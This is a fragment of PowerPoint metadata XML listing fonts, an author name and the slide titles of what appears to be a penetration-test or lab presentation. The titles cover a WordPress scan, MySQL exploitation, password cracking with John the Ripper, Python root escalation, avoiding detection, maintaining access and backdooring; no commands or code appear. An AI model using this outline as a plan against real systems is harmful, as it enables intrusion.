      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Black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Exploits Used </vt:lpstr>
      <vt:lpstr>Exploitation: [Wordpress Scan]</vt:lpstr>
      <vt:lpstr>Wordpress Scan Continued</vt:lpstr>
      <vt:lpstr>Exploitation: MySQL</vt:lpstr>
      <vt:lpstr>Exploitation: MySQL</vt:lpstr>
      <vt:lpstr>Exploitation: MySQL</vt:lpstr>
      <vt:lpstr>Exploitation: [John the Ripper]</vt:lpstr>
      <vt:lpstr>Exploitation: [Root Escalation Via Python]</vt:lpstr>
      <vt:lpstr>Avoiding Detection </vt:lpstr>
      <vt:lpstr>Exploits - WP Scan - MYSQL - Python Script</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of [MySQL] </vt:lpstr>
      <vt:lpstr>Mitigating Detection</vt:lpstr>
      <vt:lpstr>Target -1 - Python Script Elevation of Privileges - Sudo Commands</vt:lpstr>
      <vt:lpstr>Target -1 - Python Script Elevation of Privileges - Sudo Commands</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of [Hash Cracking]</vt:lpstr>
      <vt:lpstr>Maintaining Access </vt:lpstr>
      <vt:lpstr>Backdooring the Target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cp:lastModifiedBy>Bradley Lawler</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-11T22:10:38Z</dcterms:modified>
</cp:coreProperties>
</file>